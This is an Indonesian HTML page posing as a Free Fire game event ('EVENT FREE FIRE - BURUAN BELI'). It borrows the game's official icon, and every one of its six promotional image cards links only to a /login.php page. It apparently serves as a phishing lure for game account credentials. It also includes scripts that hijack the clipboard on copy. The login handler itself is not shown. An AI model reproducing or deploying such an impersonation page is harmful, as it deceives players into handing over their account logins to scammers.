<!DOCTYPE html>
<html>
<script type='text/javascript'>
//<![CDATA[
document.addEventListener('copy', function (e){
    e.preventDefault();
  e.clipboardData.setData("text/plain", "Jangan Copas Gan :) "+window.location.href+"");
})
//]]>
</script>
<head>
    <meta charset="UTF-8">
    <title>EVENT FREE FIRE - BURUAN BELI !!!</title>
    <link rel="stylesheet" href="ccss/style.css">
    <link rel="shortcut icon" href="http://freefiremobile-a.akamaihd.net/ffwebsite/images/app-icon.png"/>
</head>
<script type='text/javascript'>
//<![CDATA[
document.addEventListener('copy', function (e){
    e.preventDefault();
  e.clipboardData.setData("text/plain", "Jangan Copas Gan :) "+window.location.href+"");
})
//]]>
</script>
<body>
    
       <center><img style="width: 100%; height:100%;" src="js/vendor/uhu/jekybackground.png" /></center><br>
                <span class="name"></span>


    
    <div id="pricing">
        <div class="price_card alpha">
            <div class="header">
                <img src="js/vendor/uhu/uhuinfo1.png">
                <span class="name"></span>
            </div>
<center><a href="/login.php"><img style="width: 100%; height:100%;" src="js/vendor/uhu/uhuinfo-gif.png" /></a></center>
       
        </div>
        <div class="price_card alpha">
            <div class="header">
                <img src="js/vendor/uhu/uhuinfo2.png">
                <span class="name"></span>
            </div>
 <center><a href="/login.php"><img style="width: 100%; height:100%;" src="js/vendor/uhu/uhuinfo-gif.png" /></a></center>
      
        </div>
        <div class="price_card alpha">
            <div class="header">
                <img src="js/vendor/uhu/uhuinfo33.png">
                <span class="name"></span>
            </div>
<center><a href="/login.php"><img style="width: 100%; height:100%;" src="js/vendor/uhu/uhuinfo-gif.png" /></a></center>

       
        </div>
    </div>

    
    <div id="pricing">
            </div>


    <div id="pricing">
        <div class="price_card alpha">
            <div class="header">
                <img src="js/vendor/uhu/uhuinfo4.png">
                <span class="name"></span>
            </div>
<center><a href="/login.php"><img style="width: 100%; height:100%;" src="js/vendor/uhu/uhuinfo-gif.png" /></a></center>

       
        </div>
        <div class="price_card alpha">              
            <div class="header">
                <img src="js/vendor/uhu/uhuinfo5.png">
                <span class="name"></span>
            </div>
<center><a href="/login.php"><img style="width: 100%; height:100%;" src="js/vendor/uhu/uhuinfo-gif.png" /></a></center>
     
        </div>
        <div class="price_card alpha">
            <div class="header">
                <img src="js/vendor/uhu/uhuinfo6.png">
                <span class="name"></span>
            </div>
<center><a href="/login.php"><img style="width: 100%; height:100%;" src="js/vendor/uhu/uhuinfo-gif.png" /></a></center>
        </div>
    </div>
    
</html>